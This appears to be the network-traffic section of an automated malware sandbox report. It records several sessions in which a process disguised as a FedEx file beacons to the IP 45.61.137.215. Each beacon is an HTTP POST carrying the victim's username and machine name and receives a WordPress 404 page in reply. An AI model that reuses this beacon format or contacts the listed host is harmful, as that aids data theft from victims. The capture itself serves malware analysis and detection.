May 22, 2024 22:03:36.093094110 CEST	1236	IN	Data Raw: 75 70 70 6f 72 74 73 5b 74 5d 3d 65 5b 74 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 2c 22 66 6c 61 67 22 21 Data Ascii: upports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.support
May 22, 2024 22:03:36.096280098 CEST	1236	IN	Data Raw: 72 3a 23 33 32 33 37 33 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 39 39 39 39 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 63 61 6c 63 28 2e Data Ascii: r:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}</style><style id='global-styles-i
May 22, 2024 22:03:36.096292973 CEST	1236	IN	Data Raw: 6e 67 65 2d 74 6f 2d 76 69 76 69 64 2d 72 65 64 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 61 28 32 35 35 2c 31 30 35 2c 30 2c 31 29 20 30 25 2c 72 67 62 28 32 30 37 2c 34 36 2c 34 36 29 20 31 30 30 25 29 Data Ascii: nge-to-vivid-red: linear-gradient(135deg,rgba(255,105,0,1) 0%,rgb(207,46,46) 100%);--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray: linear-gradient(135deg,rgb(238,238,238) 0%,rgb(169,184,195) 100%);--wp--preset--gradient--cool-to-w
May 22, 2024 22:03:36.096304893 CEST	1236	IN	Data Raw: 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d 2d 32 30 3a 20 30 2e 34 34 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d 2d 33 30 3a 20 30 2e 36 37 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61 Data Ascii: -preset--spacing--20: 0.44rem;--wp--preset--spacing--30: 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5rem;--wp--preset--spacing--60: 2.25rem;--wp--preset--spacing--70: 3.38rem;--wp--preset--spacing--80: 5.06rem;--wp--p
May 22, 2024 22:03:36.096317053 CEST	108	IN	Data Raw: 77 68 69 74 65 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 70 61 6c 65 2d 70 69 6e 6b 2d 63 6f 6c 6f Data Ascii: white-color{color: var(--wp--preset--color--white) !important;}.has-pale-pink-color{color: var(--wp--preset-
May 22, 2024 22:03:36.098522902 CEST	1236	IN	Data Raw: 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 Data Ascii: -color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{colo
May 22, 2024 22:03:36.099438906 CEST	1236	IN	Data Raw: 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75 Data Ascii: minous-vivid-orange-background-color{background-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-background-color{background-color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-lig

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.7	49746	45.61.137.215	80	6192	C:\Users\user\Desktop\FedEx_776282383902.exe

Timestamp	Bytes transferred	Direction	Data
May 22, 2024 22:03:36.285873890 CEST	244	OUT	POST /index.php/t?id=090 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.61.137.215 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A316C5D8 Content-Length: 165 Connection: close
May 22, 2024 22:03:36.335956097 CEST	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk841618FRONTDESK-PC0FDD42EE188E931437F4FBE2C
May 22, 2024 22:03:39.642385960 CEST	1236	IN	HTTP/1.0 404 Not Found Date: Wed, 22 May 2024 20:03:36 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found – separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper » Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper » Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
May 22, 2024 22:03:39.642401934 CEST	1236	IN	Data Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22 Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/! This file is auto-generated /!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
May 22, 2024 22:03:39.644232035 CEST	1236	IN	Data Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
May 22, 2024 22:03:39.646214008 CEST	1236	IN	Data Raw: 75 70 70 6f 72 74 73 5b 74 5d 3d 65 5b 74 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 2c 22 66 6c 61 67 22 21 Data Ascii: upports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.support
May 22, 2024 22:03:39.646225929 CEST	1236	IN	Data Raw: 72 3a 23 33 32 33 37 33 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 39 39 39 39 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 63 61 6c 63 28 2e Data Ascii: r:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}</style><style id='global-styles-i
May 22, 2024 22:03:39.650084019 CEST	1236	IN	Data Raw: 6e 67 65 2d 74 6f 2d 76 69 76 69 64 2d 72 65 64 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 61 28 32 35 35 2c 31 30 35 2c 30 2c 31 29 20 30 25 2c 72 67 62 28 32 30 37 2c 34 36 2c 34 36 29 20 31 30 30 25 29 Data Ascii: nge-to-vivid-red: linear-gradient(135deg,rgba(255,105,0,1) 0%,rgb(207,46,46) 100%);--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray: linear-gradient(135deg,rgb(238,238,238) 0%,rgb(169,184,195) 100%);--wp--preset--gradient--cool-to-w
May 22, 2024 22:03:39.652012110 CEST	1236	IN	Data Raw: 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d 2d 32 30 3a 20 30 2e 34 34 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d 2d 33 30 3a 20 30 2e 36 37 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61 Data Ascii: -preset--spacing--20: 0.44rem;--wp--preset--spacing--30: 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5rem;--wp--preset--spacing--60: 2.25rem;--wp--preset--spacing--70: 3.38rem;--wp--preset--spacing--80: 5.06rem;--wp--p
May 22, 2024 22:03:39.652024984 CEST	1236	IN	Data Raw: 77 68 69 74 65 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 70 61 6c 65 2d 70 69 6e 6b 2d 63 6f 6c 6f Data Ascii: white-color{color: var(--wp--preset--color--white) !important;}.has-pale-pink-color{color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-c
May 22, 2024 22:03:39.655905008 CEST	1236	IN	Data Raw: 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 Data Ascii: t;}.has-vivid-red-background-color{background-color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-background-color{background-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-
May 22, 2024 22:03:39.655926943 CEST	556	IN	Data Raw: 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 Data Ascii: important;}.has-vivid-red-border-color{border-color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-border-color{border-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-bo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.7	49747	45.61.137.215	80	6192	C:\Users\user\Desktop\FedEx_776282383902.exe

Timestamp	Bytes transferred	Direction	Data
May 22, 2024 22:03:39.786935091 CEST	244	OUT	POST /index.php/t?id=090 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.61.137.215 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A316C5D8 Content-Length: 165 Connection: close
May 22, 2024 22:03:39.836019993 CEST	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk841618FRONTDESK-PC0FDD42EE188E931437F4FBE2C
May 22, 2024 22:03:42.835977077 CEST	1236	IN	HTTP/1.0 404 Not Found Date: Wed, 22 May 2024 20:03:40 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found – separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper » Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper » Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
May 22, 2024 22:03:42.836977959 CEST	1236	IN	Data Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22 Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/! This file is auto-generated /!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
May 22, 2024 22:03:42.839385033 CEST	448	IN	Data Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
May 22, 2024 22:03:42.841876030 CEST	1236	IN	Data Raw: 22 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 22 2c 65 2c 7b 6f 6e 63 65 3a 21 30 7d 29 7d 29 2c 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 Data Ascii: "DOMContentLoaded",e,{once:!0})}),new Promise(function(t){var n=function(){try{var e=JSON.parse(sessionStorage.getItem(o));if("object"==typeof e&&"number"==typeof e.timestamp&&(new Date).valueOf()<e.timestamp+604800&&"object"==typeof e.support
May 22, 2024 22:03:42.841892004 CEST	1236	IN	Data Raw: 70 65 6d 6f 6a 69 26 26 65 2e 74 77 65 6d 6f 6a 69 26 26 28 74 28 65 2e 74 77 65 6d 6f 6a 69 29 2c 74 28 65 2e 77 70 65 6d 6f 6a 69 29 29 29 7d 29 29 7d 28 28 77 69 6e 64 6f 77 2c 64 6f 63 75 6d 65 6e 74 29 2c 77 69 6e 64 6f 77 2e 5f 77 70 65 6d Data Ascii: pemoji&&e.twemoji&&(t(e.twemoji),t(e.wpemoji)))}))}((window,document),window._wpemojiSettings);/* ... */</script><style id='wp-emoji-styles-inline-css' type='text/css'>img.wp-smiley, img.emoji {display: inline !important;border: no
May 22, 2024 22:03:42.841902018 CEST	448	IN	Data Raw: 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 72 65 64 3a 20 23 63 66 32 65 32 65 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 3a 20 23 66 66 36 39 30 30 3b 2d 2d 77 Data Ascii: -color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--preset--color--light-green-cyan: #7bdcb5;--wp--preset--color--vivid-green-cyan: #00d084;--wp--preset--color
May 22, 2024 22:03:42.846730947 CEST	1236	IN	Data Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64 Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
May 22, 2024 22:03:42.849127054 CEST	1236	IN	Data Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29 Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-siz
May 22, 2024 22:03:42.849138975 CEST	448	IN	Data Raw: 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 74 65 6d Data Ascii: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important
May 22, 2024 22:03:42.851085901 CEST	1236	IN	Data Raw: 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 Data Ascii: -color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{colo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.7	49748	45.61.137.215	80	6192	C:\Users\user\Desktop\FedEx_776282383902.exe

Timestamp	Bytes transferred	Direction	Data
May 22, 2024 22:03:42.997267962 CEST	244	OUT	POST /index.php/t?id=090 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.61.137.215 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A316C5D8 Content-Length: 165 Connection: close
May 22, 2024 22:03:43.047991037 CEST	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk841618FRONTDESK-PC0FDD42EE188E931437F4FBE2C
May 22, 2024 22:03:46.146816969 CEST	1236	IN	HTTP/1.0 404 Not Found Date: Wed, 22 May 2024 20:03:43 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found – separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper » Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper » Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
May 22, 2024 22:03:46.147844076 CEST	224	IN	Data Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22 Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/! This file is auto-generated /!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessio
